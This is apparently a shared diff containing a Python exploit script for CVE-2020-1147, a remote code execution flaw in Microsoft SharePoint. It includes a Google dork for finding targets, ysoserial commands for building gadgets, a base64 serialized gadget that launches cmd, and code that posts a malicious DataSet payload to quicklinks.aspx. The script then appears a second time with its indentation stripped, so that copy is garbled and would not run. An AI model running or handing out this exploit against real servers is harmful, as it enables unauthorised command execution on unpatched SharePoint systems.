0xcrypto · March 18, 2021 04:43
diff --git a/CVE-2020-1147.py b/CVE-2020-1147.py
 # Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution
 # Google Dork: inurl:quicklinks.aspx
 # Date: 2020-08-14
 # Exploit Author: West Shepherd
 # Vendor Homepage: https://www.microsoft.com
 # Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
 # Pack 2, SharePoint Server 2019
 # Tested on: Windows 2016
 # CVE : CVE-2020-1147
 # Credit goes to Steven Seele and Soroush Dalili
 # Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html

 #!/usr/bin/python
 from sys import argv, exit, stdout, stderr
 import argparse
 import requests
 from bs4 import BeautifulSoup
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 from requests_ntlm import HttpNtlmAuth
 from urllib.parse import quote, unquote
 import logging


 class Exploit:
    # To generate the gadget use:
    # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command"
    # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command"
    gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw=='
    control_path_quicklinks = '/_layouts/15/quicklinks.aspx'
    control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'
    control_path = control_path_quicklinks

    def __init__(
            self,
            redirect=False,
            proxy_address='',
            username='',
            domain='',
            password='',
            target=''
    ):
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        self.username = '%s\\%s' % (domain, username)
        self.target = target
        self.password = password
        self.session = requests.session()
        self.redirect = redirect
        self.timeout = 0.5
        self.proxies = {
            'http': 'http://%s' % proxy_address,
            'https': 'http://%s' % proxy_address
        } \
            if proxy_address is not None \
               and proxy_address != '' else {}
        self.headers = {}
        self.query_params = {
            'Mode': "Suggestion"
        }
        self.form_values = {
            '__viewstate': '',
            '__SUGGESTIONSCACHE__': ''
        }
        self.cookies = {}
        self.payload = """\
 <DataSet>
  <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema"
 xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
    <xs:element name="somedataset" msdata:IsDataSet="true"
 msdata:UseCurrentLocale="true">
      <xs:complexType>
        <xs:choice minOccurs="0" maxOccurs="unbounded">
          <xs:element name="Exp_x0020_Table">
            <xs:complexType>
              <xs:sequence>
                <xs:element name="pwn"
 msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter,
 System.Web, Version=4.0.0.0, Culture=neutral,
 PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider,
 PresentationFramework, Version=4.0.0.0, Culture=neutral,
 PublicKeyToken=31bf3856ad364e35]], System.Data.Services,
 Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
 type="xs:anyType" minOccurs="0"/>
              </xs:sequence>
            </xs:complexType>
          </xs:element>
        </xs:choice>
      </xs:complexType>
    </xs:element>
  </xs:schema>
  <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata"
 xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
    <somedataset>
      <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0"
 diffgr:hasChanges="inserted">
        <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <ExpandedElement/>
        <ProjectedProperty0>
            <MethodName>Deserialize</MethodName>
            <MethodParameters>
                <anyType
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema"
 xsi:type="xsd:string">{GADGET}</anyType>
            </MethodParameters>
            <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
        </ProjectedProperty0>
        </pwn>
      </Exp_x0020_Table>
    </somedataset>
  </diffgr:diffgram>
 </DataSet>""".replace('{GADGET}', self.gadget)

    def do_get(self, url, params=None, data=None):
        return self.session.get(
            url=url,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            data=data,
            params=params,
            auth=HttpNtlmAuth(self.username, self.password)
        )

    def do_post(self, url, data=None, params=None):
        return self.session.post(
            url=url,
            data=data,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            params=params,
            auth=HttpNtlmAuth(self.username, self.password)
        )

    def parse_page(self, content):
        soup = BeautifulSoup(content, 'lxml')
        for key, val in self.form_values.iteritems():
            try:
                for tag in soup.select('input[name=%s]' % key):
                    try:
                        self.form_values[key] = tag['value']
                    except Exception as error:
                        stderr.write('error for key %s error %s\n' %
 (key, str(error)))
            except Exception as error:
                stderr.write('error for selector %s error %s\n' %
 (key, str(error)))
        return self

    def debug(self):
        try:
            import http.client as http_client
        except ImportError:
            import httplib as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig()
        logging.getLogger().setLevel(logging.DEBUG)
        requests_log = logging.getLogger("requests.packages.urllib3")
        requests_log.setLevel(logging.DEBUG)
        requests_log.propagate = True
        return self

    def clean(self, payload):
        payload = payload\
            .replace('\n', '')\
            .replace('\r', '')
        while '  ' in payload:
            payload = payload\
                .replace('  ', ' ')
        return payload

    def get_form(self):
        url = '%s%s' % (self.target, self.control_path)
        resp = self.do_get(url=url, params=self.query_params)
        self.parse_page(content=resp.content)
        return resp

    def send_payload(self):
        url = '%s%s' % (self.target, self.control_path)
        # self.get_form()
        self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
        self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)
        self.form_values['__viewstate'] = ''
        resp = self.do_post(url=url, params=self.query_params,
 data=self.form_values)
        return resp


 if __name__ == '__main__':
    parser = argparse.ArgumentParser(add_help=True,
 description='CVE-2020-1147 SharePoint exploit')
    try:
        parser.add_argument('-target', action='store', help='Target address: http(s)://target.com ')
        parser.add_argument('-username', action='store', default='',
 help='Username to use: first.last')
        parser.add_argument('-domain', action='store', default='',
 help='User domain to use: domain.local')
        parser.add_argument('-password', action='store', default='',
 help='Password to use: Summer2020')
        parser.add_argument('-both', action='store', default=False,
 help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False')
        parser.add_argument('-debug', action='store', default=False,
 help='Enable debugging: False')
        parser.add_argument('-proxy', action='store', default='',
 help='Enable proxy: 10.10.10.10:8080')

        if len(argv) == 1:
            parser.print_help()
            exit(1)
        options = parser.parse_args()

        exp = Exploit(
            proxy_address=options.proxy,
            username=options.username,
            domain=options.domain,
            password=options.password,
            target=options.target
        )

        if options.debug:
            exp.debug()
            stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % (
                options.target, options.username, options.domain,
 options.password, options.debug, options.proxy
            ))

        result = exp.send_payload()
        stdout.write('Response: %d\n' % result.status_code)
        if 'MicrosoftSharePointTeamServices' in result.headers:
            stdout.write('Version: %s\n' %
 result.headers['MicrosoftSharePointTeamServices'])
        if options.both and result.status_code != 200:
            exp.control_path = exp.control_path_quicklinksdialogform
            stdout.write('Trying alternate page\n')
            result = exp.send_payload()
            stdout.write('Response: %d\n' % result.status_code)

    except Exception as error:
        stderr.write('error in main %s' % str(error))
	# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution
	# Google Dork: inurl:quicklinks.aspx
	# Date: 2020-08-14
	# Exploit Author: West Shepherd
	# Vendor Homepage: https://www.microsoft.com
	# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
	# Pack 2, SharePoint Server 2019
	# Tested on: Windows 2016
	# CVE : CVE-2020-1147
	# Credit goes to Steven Seele and Soroush Dalili
	# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html

	#!/usr/bin/python
	from sys import argv, exit, stdout, stderr
	import argparse
	import requests
	from bs4 import BeautifulSoup
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	from requests_ntlm import HttpNtlmAuth
	from urllib.parse import quote, unquote
	import logging


	class Exploit:
	# To generate the gadget use:
	# ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command"
	# ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command"
	gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw=='
	control_path_quicklinks = '/_layouts/15/quicklinks.aspx'
	control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'
	control_path = control_path_quicklinks

	def __init__(
	self,
	redirect=False,
	proxy_address='',
	username='',
	domain='',
	password='',
	target=''
	):
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
	self.username = '%s\\%s' % (domain, username)
	self.target = target
	self.password = password
	self.session = requests.session()
	self.redirect = redirect
	self.timeout = 0.5
	self.proxies = {
	'http': 'http://%s' % proxy_address,
	'https': 'http://%s' % proxy_address
	} \
	if proxy_address is not None \
	and proxy_address != '' else {}
	self.headers = {}
	self.query_params = {
	'Mode': "Suggestion"
	}
	self.form_values = {
	'__viewstate': '',
	'__SUGGESTIONSCACHE__': ''
	}
	self.cookies = {}
	self.payload = """\
	<DataSet>
	<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema"
	xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
	<xs:element name="somedataset" msdata:IsDataSet="true"
	msdata:UseCurrentLocale="true">
	<xs:complexType>
	<xs:choice minOccurs="0" maxOccurs="unbounded">
	<xs:element name="Exp_x0020_Table">
	<xs:complexType>
	<xs:sequence>
	<xs:element name="pwn"
	msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter,
	System.Web, Version=4.0.0.0, Culture=neutral,
	PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider,
	PresentationFramework, Version=4.0.0.0, Culture=neutral,
	PublicKeyToken=31bf3856ad364e35]], System.Data.Services,
	Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
	type="xs:anyType" minOccurs="0"/>
	</xs:sequence>
	</xs:complexType>
	</xs:element>
	</xs:choice>
	</xs:complexType>
	</xs:element>
	</xs:schema>
	<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata"
	xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
	<somedataset>
	<Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0"
	diffgr:hasChanges="inserted">
	<pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xmlns:xsd="http://www.w3.org/2001/XMLSchema">
	<ExpandedElement/>
	<ProjectedProperty0>
	<MethodName>Deserialize</MethodName>
	<MethodParameters>
	<anyType
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xmlns:xsd="http://www.w3.org/2001/XMLSchema"
	xsi:type="xsd:string">{GADGET}</anyType>
	</MethodParameters>
	<ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
	</ProjectedProperty0>
	</pwn>
	</Exp_x0020_Table>
	</somedataset>
	</diffgr:diffgram>
	</DataSet>""".replace('{GADGET}', self.gadget)

	def do_get(self, url, params=None, data=None):
	return self.session.get(
	url=url,
	verify=False,
	allow_redirects=self.redirect,
	headers=self.headers,
	cookies=self.cookies,
	proxies=self.proxies,
	data=data,
	params=params,
	auth=HttpNtlmAuth(self.username, self.password)
	)

	def do_post(self, url, data=None, params=None):
	return self.session.post(
	url=url,
	data=data,
	verify=False,
	allow_redirects=self.redirect,
	headers=self.headers,
	cookies=self.cookies,
	proxies=self.proxies,
	params=params,
	auth=HttpNtlmAuth(self.username, self.password)
	)

	def parse_page(self, content):
	soup = BeautifulSoup(content, 'lxml')
	for key, val in self.form_values.iteritems():
	try:
	for tag in soup.select('input[name=%s]' % key):
	try:
	self.form_values[key] = tag['value']
	except Exception as error:
	stderr.write('error for key %s error %s\n' %
	(key, str(error)))
	except Exception as error:
	stderr.write('error for selector %s error %s\n' %
	(key, str(error)))
	return self

	def debug(self):
	try:
	import http.client as http_client
	except ImportError:
	import httplib as http_client
	http_client.HTTPConnection.debuglevel = 1
	logging.basicConfig()
	logging.getLogger().setLevel(logging.DEBUG)
	requests_log = logging.getLogger("requests.packages.urllib3")
	requests_log.setLevel(logging.DEBUG)
	requests_log.propagate = True
	return self

	def clean(self, payload):
	payload = payload\
	.replace('\n', '')\
	.replace('\r', '')
	while ' ' in payload:
	payload = payload\
	.replace(' ', ' ')
	return payload

	def get_form(self):
	url = '%s%s' % (self.target, self.control_path)
	resp = self.do_get(url=url, params=self.query_params)
	self.parse_page(content=resp.content)
	return resp

	def send_payload(self):
	url = '%s%s' % (self.target, self.control_path)
	# self.get_form()
	self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
	self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)
	self.form_values['__viewstate'] = ''
	resp = self.do_post(url=url, params=self.query_params,
	data=self.form_values)
	return resp


	if __name__ == '__main__':
	parser = argparse.ArgumentParser(add_help=True,
	description='CVE-2020-1147 SharePoint exploit')
	try:
	parser.add_argument('-target', action='store', help='Target address: http(s)://target.com ')
	parser.add_argument('-username', action='store', default='',
	help='Username to use: first.last')
	parser.add_argument('-domain', action='store', default='',
	help='User domain to use: domain.local')
	parser.add_argument('-password', action='store', default='',
	help='Password to use: Summer2020')
	parser.add_argument('-both', action='store', default=False,
	help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False')
	parser.add_argument('-debug', action='store', default=False,
	help='Enable debugging: False')
	parser.add_argument('-proxy', action='store', default='',
	help='Enable proxy: 10.10.10.10:8080')

	if len(argv) == 1:
	parser.print_help()
	exit(1)
	options = parser.parse_args()

	exp = Exploit(
	proxy_address=options.proxy,
	username=options.username,
	domain=options.domain,
	password=options.password,
	target=options.target
	)

	if options.debug:
	exp.debug()
	stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % (
	options.target, options.username, options.domain,
	options.password, options.debug, options.proxy
	))

	result = exp.send_payload()
	stdout.write('Response: %d\n' % result.status_code)
	if 'MicrosoftSharePointTeamServices' in result.headers:
	stdout.write('Version: %s\n' %
	result.headers['MicrosoftSharePointTeamServices'])
	if options.both and result.status_code != 200:
	exp.control_path = exp.control_path_quicklinksdialogform
	stdout.write('Trying alternate page\n')
	result = exp.send_payload()
	stdout.write('Response: %d\n' % result.status_code)

	except Exception as error:
	stderr.write('error in main %s' % str(error))